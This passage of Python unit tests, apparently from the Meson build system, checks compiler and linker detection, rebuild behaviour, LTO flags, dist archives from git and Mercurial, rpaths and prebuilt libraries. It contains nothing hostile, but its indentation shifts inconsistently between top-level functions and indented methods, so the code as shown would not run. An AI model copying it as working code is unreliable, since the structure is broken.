                self.assertIsInstance(ecc, intel)
                self.assertIsInstance(elinker, ar)
            elif ebase.startswith('cl'):
                self.assertIsInstance(ecc, msvc)
                self.assertIsInstance(elinker, lib)
            else:
                raise AssertionError(f'Unknown compiler {evalue!r}')
            # Check that we actually used the evalue correctly as the compiler
            self.assertEqual(ecc.get_exelist(), split_args(evalue))
        # Do auto-detection of compiler based on platform, PATH, etc.
        cc = getattr(env, f'detect_{lang}_compiler')(MachineChoice.HOST)
        self.assertTrue(cc.version)
        linker = env.detect_static_linker(cc)
        # Check compiler type
        if isinstance(cc, gnu):
            self.assertIsInstance(linker, ar)
            if is_osx():
                self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
            elif is_sunos():
                self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
            else:
                self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
        if isinstance(cc, clangcl):
            self.assertIsInstance(linker, lib)
            self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
        if isinstance(cc, clang):
            self.assertIsInstance(linker, ar)
            if is_osx():
                self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
            elif is_windows():
                # This is clang, not clang-cl. This can be either an
                # ld-like linker of link.exe-like linker (usually the
                # former for msys2, the latter otherwise)
                self.assertIsInstance(cc.linker, (mesonbuild.linkers.MSVCDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
            else:
                self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
        if isinstance(cc, intel):
            self.assertIsInstance(linker, ar)
            if is_osx():
                self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
            elif is_windows():
                self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
            else:
                self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
        if isinstance(cc, msvc):
            self.assertTrue(is_windows())
            self.assertIsInstance(linker, lib)
            self.assertEqual(cc.id, 'msvc')
            self.assertTrue(hasattr(cc, 'is_64'))
            self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
            # If we're on Windows CI, we know what the compiler will be
            if 'arch' in os.environ:
                if os.environ['arch'] == 'x64':
                    self.assertTrue(cc.is_64)
                else:
                    self.assertFalse(cc.is_64)
        # Set evar ourselves to a wrapper script that just calls the same
        # exelist + some argument. This is meant to test that setting
        # something like `ccache gcc -pipe` or `distcc ccache gcc` works.
        wrapper = os.path.join(testdir, 'compiler wrapper.py')
        wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
        os.environ[evar] = ' '.join(quote_arg(w) for w in wrappercc)
        # Check static linker too
        wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
        os.environ['AR'] = ' '.join(quote_arg(w) for w in wrapperlinker)
        # Need a new env to re-run environment loading
        env = get_fake_env(testdir, self.builddir, self.prefix)
        wcc = getattr(env, f'detect_{lang}_compiler')(MachineChoice.HOST)
        wlinker = env.detect_static_linker(wcc)
        # Pop it so we don't use it for the next detection
        evalue = os.environ.pop('AR')
        # Must be the same type since it's a wrapper around the same exelist
        self.assertIs(type(cc), type(wcc))
        self.assertIs(type(linker), type(wlinker))
        # Ensure that the exelist is correct
        self.assertEqual(wcc.get_exelist(), wrappercc)
        self.assertEqual(wlinker.get_exelist(), wrapperlinker)
        # Ensure that the version detection worked correctly
        self.assertEqual(cc.version, wcc.version)
        if hasattr(cc, 'is_64'):
            self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
    """Assembly (.S) sources must always be compiled with the C compiler,
    even inside targets that also contain C++ sources."""
    testdir = os.path.join(self.common_test_dir, '133 c cpp and asm')
    # Skip if building with MSVC
    env = get_fake_env(testdir, self.builddir, self.prefix)
    if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
        raise unittest.SkipTest('MSVC can\'t compile assembly')
    self.init(testdir)
    # Maps target name -> {source language: compiler used}.
    commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
    for cmd in self.get_compdb():
        # Get compiler
        split = split_args(cmd['command'])
        if split[0] == 'ccache':
            compiler = split[1]
        else:
            compiler = split[0]
        # Classify commands
        if 'Ic-asm' in cmd['command']:
            if cmd['file'].endswith('.S'):
                commands['c-asm']['asm'] = compiler
            elif cmd['file'].endswith('.c'):
                commands['c-asm']['c'] = compiler
            else:
                # Bug fix: this message wrongly referred to 'cpp-asm'.
                raise AssertionError('{!r} found in c-asm?'.format(cmd['command']))
        elif 'Icpp-asm' in cmd['command']:
            if cmd['file'].endswith('.S'):
                commands['cpp-asm']['asm'] = compiler
            elif cmd['file'].endswith('.cpp'):
                commands['cpp-asm']['cpp'] = compiler
            else:
                raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
        elif 'Ic-cpp-asm' in cmd['command']:
            if cmd['file'].endswith('.S'):
                commands['c-cpp-asm']['asm'] = compiler
            elif cmd['file'].endswith('.c'):
                commands['c-cpp-asm']['c'] = compiler
            elif cmd['file'].endswith('.cpp'):
                commands['c-cpp-asm']['cpp'] = compiler
            else:
                raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
        elif 'Icpp-c-asm' in cmd['command']:
            if cmd['file'].endswith('.S'):
                commands['cpp-c-asm']['asm'] = compiler
            elif cmd['file'].endswith('.c'):
                commands['cpp-c-asm']['c'] = compiler
            elif cmd['file'].endswith('.cpp'):
                commands['cpp-c-asm']['cpp'] = compiler
            else:
                raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
        else:
            raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
    # Check that .S files are always built with the C compiler
    self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
    self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
    self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
    self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
    self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
    self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
    self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
    self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
    # Check that the c-asm target is always linked with the C linker
    build_ninja = os.path.join(self.builddir, 'build.ninja')
    with open(build_ninja, encoding='utf-8') as f:
        contents = f.read()
        m = re.search('build c-asm.*: c_LINKER', contents)
    self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
    '''
    Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
    not LDFLAGS.
    '''
    testdir = os.path.join(self.common_test_dir, '132 get define')
    define = 'MESON_TEST_DEFINE_VALUE'
    # NOTE: this list can't have \n, ' or "
    # \n is never substituted by the GNU pre-processor via a -D define
    # ' and " confuse split_args() even when they are escaped
    # % and # confuse the MSVC preprocessor
    # !, ^, *, and < confuse lcc preprocessor
    value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
    for env_var in ('CPPFLAGS', 'CFLAGS'):
        env = {
            env_var: f'-D{define}="{value}"',
            # LDFLAGS must be ignored by preprocessor checks; if it leaked
            # through, the project would see MESON_FAIL_VALUE and fail.
            'LDFLAGS': '-DMESON_FAIL_VALUE=cflags-read',
        }
        self.init(testdir, extra_args=[f'-D{define}={value}'], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
    """Configuring the same project twice from scratch must produce
    identical meson_exe*.dat wrapper files."""
    testdir = os.path.join(self.common_test_dir, '109 custom target capture')
    self.init(testdir)
    first_run = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
    self.wipe()
    self.init(testdir)
    second_run = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
    self.assertListEqual(first_run, second_run)
def test_noop_changes_cause_no_rebuilds(self):
    '''
    Test that no-op changes to the build files such as mtime do not cause
    a rebuild of anything.
    '''
    testdir = os.path.join(self.common_test_dir, '6 linkshared')
    self.init(testdir)
    self.build()
    # Immediately rebuilding should not do anything
    self.assertBuildIsNoop()
    # Changing mtime of meson.build should not rebuild anything
    self.utime(os.path.join(testdir, 'meson.build'))
    self.assertReconfiguredBuildIsNoop()
    # Changing mtime of libfile.c should rebuild the library, but not relink the executable
    self.utime(os.path.join(testdir, 'libfile.c'))
    self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
    '''
    Test that changes to sources and headers cause rebuilds, but not
    changes to unused files (as determined by the dependency file) in the
    input files list.
    '''
    srcdir = os.path.join(self.common_test_dir, '19 header in file list')
    self.init(srcdir)
    self.build()
    # A build immediately after a build must be a no-op.
    self.assertBuildIsNoop()
    # Touching the header must cause the program to be rebuilt.
    self.utime(os.path.join(srcdir, 'header.h'))
    self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
    '''
    Test that in a custom target, changes to the input files, the
    ExternalProgram, and any File objects on the command-line cause
    a rebuild.
    '''
    srcdir = os.path.join(self.common_test_dir, '57 custom header generator')
    self.init(srcdir)
    self.build()
    # A build immediately after a build must be a no-op.
    self.assertBuildIsNoop()
    # Touching the input, the generator script, or the command-line File
    # must each trigger a rebuild of the program.
    for fname in ('input.def', 'makeheader.py', 'somefile.txt'):
        self.utime(os.path.join(srcdir, fname))
        self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
    '''
    Test that changes to generator programs in the source tree cause
    a rebuild.
    '''
    srcdir = os.path.join(self.common_test_dir, '90 gen extra')
    self.init(srcdir)
    self.build()
    # A build immediately after a build must be a no-op.
    self.assertBuildIsNoop()
    # Touching the generator script must rebuild the target consuming
    # its output.
    self.utime(os.path.join(srcdir, 'srcgen.py'))
    self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
    '''
    Test that static libraries can be built with LTO and linked to
    executables. On Linux, this requires the use of gcc-ar.
    https://github.com/mesonbuild/meson/issues/1646
    '''
    testdir = os.path.join(self.common_test_dir, '5 linkstatic')
    env = get_fake_env(testdir, self.builddir, self.prefix)
    # Windows clang cannot do LTO yet, so bail out early there.
    if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
        raise unittest.SkipTest('LTO not (yet) supported by windows clang')
    self.init(testdir, extra_args='-Db_lto=true')
    self.build()
    self.run_tests()
@skip_if_not_base_option('b_lto_threads')
def test_lto_threads(self):
    """Check that b_lto_threads injects the expected LTO thread flags into
    every compiled source of every target."""
    testdir = os.path.join(self.common_test_dir, '6 linkshared')
    env = get_fake_env(testdir, self.builddir, self.prefix)
    cc = env.detect_c_compiler(MachineChoice.HOST)
    extra_args: T.List[str] = []
    if cc.get_id() == 'clang':
        if is_windows():
            raise unittest.SkipTest('LTO not (yet) supported by windows clang')
        # clang warns about unused -flto thread arguments; make that fatal
        # so a regression shows up as a build failure.
        extra_args.append('-D_cargs=-Werror=unused-command-line-argument')
    self.init(testdir, extra_args=['-Db_lto=true', '-Db_lto_threads=8'] + extra_args)
    self.build()
    self.run_tests()
    expected = set(cc.get_lto_compile_args(threads=8))
    # This assumes all of the targets support lto
    for target in self.introspect('--targets'):
        for src in target['target_sources']:
            for flag in expected:
                self.assertIn(flag, src['parameters'])
@skip_if_not_base_option('b_lto_mode')
@skip_if_not_base_option('b_lto_threads')
def test_lto_mode(self):
    # Check that b_lto_mode=thin injects the expected thinLTO compile
    # flags into every target source. thinLTO is a clang-only feature.
    testdir = os.path.join(self.common_test_dir, '6 linkshared')
    env = get_fake_env(testdir, self.builddir, self.prefix)
    cc = env.detect_c_compiler(MachineChoice.HOST)
    if cc.get_id() != 'clang':
        raise unittest.SkipTest('Only clang currently supports thinLTO')
    if cc.linker.id not in {'ld.lld', 'ld.gold', 'ld64', 'lld-link'}:
        raise unittest.SkipTest('thinLTO requires ld.lld, ld.gold, ld64, or lld-link')
    elif is_windows():
        # NOTE(review): only reached when the linker *is* supported;
        # windows clang still cannot do LTO at all.
        raise unittest.SkipTest('LTO not (yet) supported by windows clang')
    self.init(testdir, extra_args=['-Db_lto=true', '-Db_lto_mode=thin', '-Db_lto_threads=8', '-Dc_args=-Werror=unused-command-line-argument'])
    self.build()
    self.run_tests()
    expected = set(cc.get_lto_compile_args(threads=8, mode='thin'))
    targets = self.introspect('--targets')
    # This assumes all of the targets support lto
    for t in targets:
        for s in t['target_sources']:
            # Subset check: flag order within 'parameters' is irrelevant.
            self.assertTrue(expected.issubset(set(s['parameters'])), f'Incorrect values for {t["name"]}')
def test_dist_git(self):
    """Run the dist archive tests against a git checkout."""
    if shutil.which('git') is None:
        raise unittest.SkipTest('Git not found')
    if self.backend is not Backend.ninja:
        raise unittest.SkipTest('Dist is only supported with Ninja')
    try:
        self.dist_impl(_git_init, _git_add_all)
    except PermissionError:
        # When run under Windows CI, something (virus scanner?)
        # holds on to the git files so cleaning up the dir
        # fails sometimes.
        pass
def has_working_hg(self):
    """Return True if a usable Mercurial binary is available on PATH.

    Merely finding 'hg' is not enough: CI under macOS has been seen to
    pass the which() check even though Mercurial is not actually
    installed, so we run 'hg --version' and require a zero exit status.
    """
    if not shutil.which('hg'):
        return False
    try:
        # Return the comparison directly instead of the old
        # if-return-False/return-True chain; behavior is identical.
        return subprocess.call(['hg', '--version'],
                               stdout=subprocess.DEVNULL,
                               stderr=subprocess.DEVNULL) == 0
    except FileNotFoundError:
        return False
def test_dist_hg(self):
    """Run the dist archive tests against a Mercurial checkout."""
    if not self.has_working_hg():
        raise unittest.SkipTest('Mercurial not found or broken.')
    if self.backend is not Backend.ninja:
        raise unittest.SkipTest('Dist is only supported with Ninja')

    def hg_init(project_dir):
        # Turn project_dir into a committed hg checkout with a minimal
        # user identity configured.
        subprocess.check_call(['hg', 'init'], cwd=project_dir)
        # Bug fix: specify the encoding explicitly instead of relying on
        # the locale default, as the rest of this file does.
        with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w', encoding='utf-8') as f:
            print('[ui]', file=f)
            print('username=Author Person <teh_coderz@example.com>', file=f)
        subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
        subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)

    try:
        self.dist_impl(hg_init, include_subprojects=False)
    except PermissionError:
        # When run under Windows CI, something (virus scanner?)
        # holds on to the hg files so cleaning up the dir
        # fails sometimes.
        pass
def test_dist_git_script(self):
    """'meson dist' must run dist scripts from a git checkout, including
    subproject dist scripts when --include-subprojects is given."""
    if shutil.which('git') is None:
        raise unittest.SkipTest('Git not found')
    if self.backend is not Backend.ninja:
        raise unittest.SkipTest('Dist is only supported with Ninja')
    try:
        with tempfile.TemporaryDirectory() as tmpdir:
            project_dir = os.path.join(tmpdir, 'a')
            shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
                            project_dir)
            _git_init(project_dir)
            self.init(project_dir)
            self.build('dist')
            # Now with subprojects included; the known-broken subproject
            # dist script is disabled via the project option.
            self.new_builddir()
            self.init(project_dir, extra_args=['-Dsub:broken_dist_script=false'])
            self._run(self.meson_command + ['dist', '--include-subprojects'], workdir=self.builddir)
    except PermissionError:
        # When run under Windows CI, something (virus scanner?)
        # holds on to the git files so cleaning up the dir
        # fails sometimes.
        pass
def create_dummy_subproject(self, project_dir, name):
    """Create a minimal subproject called *name* under *project_dir*.

    Writes a one-line meson.build declaring the project (version 1.0)
    and returns the path of the new subproject directory.
    """
    path = os.path.join(project_dir, 'subprojects', name)
    os.makedirs(path)
    # Bug fix: be explicit about the encoding instead of relying on the
    # locale default.
    with open(os.path.join(path, 'meson.build'), 'w', encoding='utf-8') as ofile:
        ofile.write(f"project('{name}', version: '1.0')")
    return path
def dist_impl(self, vcs_init, vcs_add_all=None, include_subprojects=True):
    """Shared implementation for the dist tests.

    vcs_init: callable that turns a directory into a VCS checkout.
    vcs_add_all: optional callable that adds a directory's contents to an
        already-existing checkout (used for the same-repo subproject).
    include_subprojects: whether to create subprojects and verify their
        presence/absence in the generated archives.
    """
    # Create this on the fly because having rogue .git directories inside
    # the source tree leads to all kinds of trouble.
    with tempfile.TemporaryDirectory() as project_dir:
        # Bug fix: write with an explicit encoding; the reads elsewhere in
        # this file already use utf-8.
        with open(os.path.join(project_dir, 'meson.build'), 'w', encoding='utf-8') as ofile:
            ofile.write(textwrap.dedent('''\
                project('disttest', 'c', version : '1.4.3')
                e = executable('distexe', 'distexe.c')
                test('dist test', e)
                subproject('vcssub', required : false)
                subproject('tarballsub', required : false)
                subproject('samerepo', required : false)
                '''))
        with open(os.path.join(project_dir, 'distexe.c'), 'w', encoding='utf-8') as ofile:
            ofile.write(textwrap.dedent('''\
                #include<stdio.h>
                int main(int argc, char **argv) {
                    printf("I am a distribution test.\\n");
                    return 0;
                }
                '''))
        xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
        xz_checksumfile = xz_distfile + '.sha256sum'
        gz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.gz')
        gz_checksumfile = gz_distfile + '.sha256sum'
        zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
        zip_checksumfile = zip_distfile + '.sha256sum'
        vcs_init(project_dir)
        if include_subprojects:
            vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
            self.create_dummy_subproject(project_dir, 'tarballsub')
            self.create_dummy_subproject(project_dir, 'unusedsub')
        if vcs_add_all:
            vcs_add_all(self.create_dummy_subproject(project_dir, 'samerepo'))
        self.init(project_dir)
        self.build('dist')
        # A plain 'dist' produces only the default xztar archive.
        self.assertPathExists(xz_distfile)
        self.assertPathExists(xz_checksumfile)
        self.assertPathDoesNotExist(gz_distfile)
        self.assertPathDoesNotExist(gz_checksumfile)
        self.assertPathDoesNotExist(zip_distfile)
        self.assertPathDoesNotExist(zip_checksumfile)
        # Each requested format produces its archive and checksum file.
        self._run(self.meson_command + ['dist', '--formats', 'gztar'],
                  workdir=self.builddir)
        self.assertPathExists(gz_distfile)
        self.assertPathExists(gz_checksumfile)
        self._run(self.meson_command + ['dist', '--formats', 'zip'],
                  workdir=self.builddir)
        self.assertPathExists(zip_distfile)
        self.assertPathExists(zip_checksumfile)
        os.remove(xz_distfile)
        os.remove(xz_checksumfile)
        os.remove(gz_distfile)
        os.remove(gz_checksumfile)
        os.remove(zip_distfile)
        os.remove(zip_checksumfile)
        # Multiple formats in one invocation produce all of them.
        self._run(self.meson_command + ['dist', '--formats', 'xztar,gztar,zip'],
                  workdir=self.builddir)
        self.assertPathExists(xz_distfile)
        self.assertPathExists(xz_checksumfile)
        self.assertPathExists(gz_distfile)
        self.assertPathExists(gz_checksumfile)
        self.assertPathExists(zip_distfile)
        self.assertPathExists(zip_checksumfile)
        if include_subprojects:
            # Verify that without --include-subprojects we have files from
            # the main project and also files from subprojects part of the
            # main vcs repository.
            z = zipfile.ZipFile(zip_distfile)
            expected = ['disttest-1.4.3/',
                        'disttest-1.4.3/meson.build',
                        'disttest-1.4.3/distexe.c']
            if vcs_add_all:
                expected += ['disttest-1.4.3/subprojects/',
                             'disttest-1.4.3/subprojects/samerepo/',
                             'disttest-1.4.3/subprojects/samerepo/meson.build']
            self.assertEqual(sorted(expected),
                             sorted(z.namelist()))
            # Verify that with --include-subprojects we now also have files
            # from tarball and separate vcs subprojects. But not files from
            # unused subprojects.
            self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
                      workdir=self.builddir)
            z = zipfile.ZipFile(zip_distfile)
            expected += ['disttest-1.4.3/subprojects/tarballsub/',
                         'disttest-1.4.3/subprojects/tarballsub/meson.build',
                         'disttest-1.4.3/subprojects/vcssub/',
                         'disttest-1.4.3/subprojects/vcssub/meson.build']
            self.assertEqual(sorted(expected),
                             sorted(z.namelist()))
        if vcs_add_all:
            # Verify we can distribute separately subprojects in the same vcs
            # repository as the main project.
            subproject_dir = os.path.join(project_dir, 'subprojects', 'samerepo')
            self.new_builddir()
            self.init(subproject_dir)
            self.build('dist')
            xz_distfile = os.path.join(self.distdir, 'samerepo-1.0.tar.xz')
            xz_checksumfile = xz_distfile + '.sha256sum'
            self.assertPathExists(xz_distfile)
            self.assertPathExists(xz_checksumfile)
            tar = tarfile.open(xz_distfile, "r:xz")
            self.assertEqual(sorted(['samerepo-1.0',
                                     'samerepo-1.0/meson.build']),
                             sorted([i.name for i in tar]))
def test_rpath_uses_ORIGIN(self):
    '''
    Test that built targets use $ORIGIN in rpath, which ensures that they
    are relocatable and ensures that builds are reproducible since the
    build directory won't get embedded into the built binaries.
    '''
    if is_windows() or is_cygwin():
        raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
    testdir = os.path.join(self.common_test_dir, '39 library chain')
    self.init(testdir)
    self.build()
    # These link against other libraries, so they must carry an rpath.
    for each in ('prog', 'subdir/liblib1.so', ):
        rpath = get_rpath(os.path.join(self.builddir, each))
        self.assertTrue(rpath, f'Rpath could not be determined for {each}.')
        if is_dragonflybsd():
            # DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
            # so ignore that.
            self.assertTrue(rpath.startswith('/usr/lib/gcc'))
            rpaths = rpath.split(':')[1:]
        else:
            rpaths = rpath.split(':')
        # Every remaining rpath entry must be relative to $ORIGIN.
        for path in rpaths:
            self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
    # These two don't link to anything else, so they do not need an rpath entry.
    for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
        rpath = get_rpath(os.path.join(self.builddir, each))
        if is_dragonflybsd():
            # The rpath should be equal to /usr/lib/gccVERSION
            self.assertTrue(rpath.startswith('/usr/lib/gcc'))
            self.assertEqual(len(rpath.split(':')), 1)
        else:
            self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
    """The compile command must contain both -D FOO and -D BAR (in one of
    the possible argument syntaxes) rather than deduplicating the
    repeated -D flag."""
    testdir = os.path.join(self.unit_test_dir, '9 d dedup')
    self.init(testdir)
    cmd = self.get_compdb()[0]['command']
    variants = ('-D FOO -D BAR',
                '"-D" "FOO" "-D" "BAR"',
                '/D FOO /D BAR',
                '"/D" "FOO" "/D" "BAR"')
    self.assertTrue(any(variant in cmd for variant in variants))
def test_all_forbidden_targets_tested(self):
    '''
    Test that all forbidden targets are tested in the '150 reserved targets'
    test. Needs to be a unit test because it accesses Meson internals.
    '''
    testdir = os.path.join(self.common_test_dir, '150 reserved targets')
    targets = mesonbuild.coredata.FORBIDDEN_TARGET_NAMES
    # 'build.ninja' does not get its own directory in the test project,
    # and 'PHONY' would duplicate 'phony' with only a case difference.
    for excluded in ('build.ninja', 'PHONY'):
        targets.pop(excluded)
    for target_name in targets:
        self.assertPathExists(os.path.join(testdir, target_name))
def detect_prebuild_env(self):
    """Detect the host C compiler and static linker, and return them
    together with the platform's object and shared-library suffixes."""
    env = get_fake_env()
    cc = env.detect_c_compiler(MachineChoice.HOST)
    stlinker = env.detect_static_linker(cc)
    if mesonbuild.mesonlib.is_windows():
        suffixes = ('obj', 'dll')
    elif mesonbuild.mesonlib.is_cygwin():
        suffixes = ('o', 'dll')
    elif mesonbuild.mesonlib.is_osx():
        suffixes = ('o', 'dylib')
    else:
        suffixes = ('o', 'so')
    object_suffix, shared_suffix = suffixes
    return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
    """Compile *source* into *objectfile* with *compiler*, bypassing Meson.

    Used to manufacture prebuilt objects/libraries for the prebuilt-*
    tests. Compiler output is discarded.
    """
    extra_args = extra_args or []
    if compiler.get_argument_syntax() == 'msvc':
        syntax_args = ['/nologo', '/Fo' + objectfile, '/c', source]
    else:
        syntax_args = ['-c', source, '-o', objectfile]
    cmd = compiler.get_exelist() + syntax_args + extra_args
    subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
    """A prebuilt object file placed in the source tree can be linked
    into a target."""
    cc, _, objext, _ = self.detect_prebuild_env()
    testdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
    csource = os.path.join(testdir, 'source.c')
    objfile = os.path.join(testdir, 'prebuilt.' + objext)
    # Manufacture the object by hand, then let the project pick it up.
    self.pbcompile(cc, csource, objfile)
    try:
        self.init(testdir)
        self.build()
        self.run_tests()
    finally:
        # Never leave build products behind in the source tree.
        os.unlink(objfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
    """Compile *source* and archive the resulting object into the static
    library *outfile*, bypassing Meson.

    The intermediate object file is always deleted; only the archive is
    left behind (the calling test is responsible for removing it).
    """
    if extra_args is None:
        extra_args = []
    # Bug fix: removed the dead hand-rolled 'lib'/'ar' command lines that
    # used to be computed here and then unconditionally overwritten by
    # the linker-derived command below.
    link_cmd = linker.get_exelist()
    link_cmd += linker.get_always_args()
    link_cmd += linker.get_std_link_args()
    link_cmd += linker.get_output_args(outfile)
    link_cmd += [objectfile]
    self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
    try:
        subprocess.check_call(link_cmd)
    finally:
        os.unlink(objectfile)
def test_prebuilt_static_lib(self):
    """A prebuilt static library placed in the source tree can be used
    as a dependency."""
    cc, stlinker, objext, _ = self.detect_prebuild_env()
    testdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
    csource = os.path.join(testdir, 'libdir/best.c')
    objfile = os.path.join(testdir, 'libdir/best.' + objext)
    stlibfile = os.path.join(testdir, 'libdir/libbest.a')
    # Manufacture the archive by hand, then let the project pick it up.
    self.build_static_lib(cc, stlinker, csource, objfile, stlibfile)
    # Run the test
    try:
        self.init(testdir)
        self.build()
        self.run_tests()
    finally:
        # Never leave build products behind in the source tree.
        os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
    """Compile *source* and link it into the shared library *outfile*,
    bypassing Meson.

    *impfile* is the import-library path; it is only used on the MSVC
    argument syntax path. The intermediate object file is always deleted;
    the shared library is left behind for the calling test to remove.
    """
    if extra_args is None:
        extra_args = []
    if compiler.get_argument_syntax() == 'msvc':
        link_cmd = compiler.get_linker_exelist() + [
            '/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
            '/OUT:' + outfile, objectfile]
    else:
        # PIC is required for shared objects everywhere except on
        # Windows/Cygwin/macOS.
        if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
            extra_args += ['-fPIC']
        link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
        # macOS's ld does not understand -soname.
        if not mesonbuild.mesonlib.is_osx():
            link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
    self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
    try:
        subprocess.check_call(link_cmd)
    finally:
        os.unlink(objectfile)
    def test_prebuilt_shared_lib(self):
        '''
        Test that a shared library prebuilt in the source tree can be
        found and linked against by a meson project.
        '''
        (cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
        tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
        source = os.path.join(tdir, 'alexandria.c')
        objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
        impfile = os.path.join(tdir, 'alexandria.lib')
        # The library filename convention differs per platform.
        if cc.get_argument_syntax() == 'msvc':
            shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
        elif is_cygwin():
            shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
        else:
            shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
        self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
        # Run the test
        try:
            self.init(tdir)
            self.build()
            self.run_tests()
        finally:
            # The library lives in the source tree, so always clean it up.
            os.unlink(shlibfile)
            if mesonbuild.mesonlib.is_windows():
                # Clean up all the garbage MSVC writes in the
                # source tree.
                for fname in glob(os.path.join(tdir, 'alexandria.*')):
                    if os.path.splitext(fname)[1] not in ['.c', '.h']:
                        os.unlink(fname)
    @skipIfNoPkgconfig
    def test_pkgconfig_static(self):
        '''
        Test that the we prefer static libraries when `static: true` is
        passed to dependency() with pkg-config. Can't be an ordinary test
        because we need to build libs and try to find them from meson.build

        Also test that it's not a hard error to have unsatisfiable library deps
        since system libraries -lm will never be found statically.
        https://github.com/mesonbuild/meson/issues/2785
        '''
        (cc, stlinker, objext, shext) = self.detect_prebuild_env()
        testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
        source = os.path.join(testdir, 'foo.c')
        objectfile = os.path.join(testdir, 'foo.' + objext)
        stlibfile = os.path.join(testdir, 'libfoo.a')
        impfile = os.path.join(testdir, 'foo.lib')
        # The shared-library filename convention differs per platform.
        if cc.get_argument_syntax() == 'msvc':
            shlibfile = os.path.join(testdir, 'foo.' + shext)
        elif is_cygwin():
            shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
        else:
            shlibfile = os.path.join(testdir, 'libfoo.' + shext)
        # Build libs
        self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
        self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
        # Run test
        try:
            # Point pkg-config at the build dir so the generated .pc is found.
            self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
            self.build()
            self.run_tests()
        finally:
            # Both libraries live in the source tree; always clean them up.
            os.unlink(stlibfile)
            os.unlink(shlibfile)
            if mesonbuild.mesonlib.is_windows():
                # Clean up all the garbage MSVC writes in the
                # source tree.
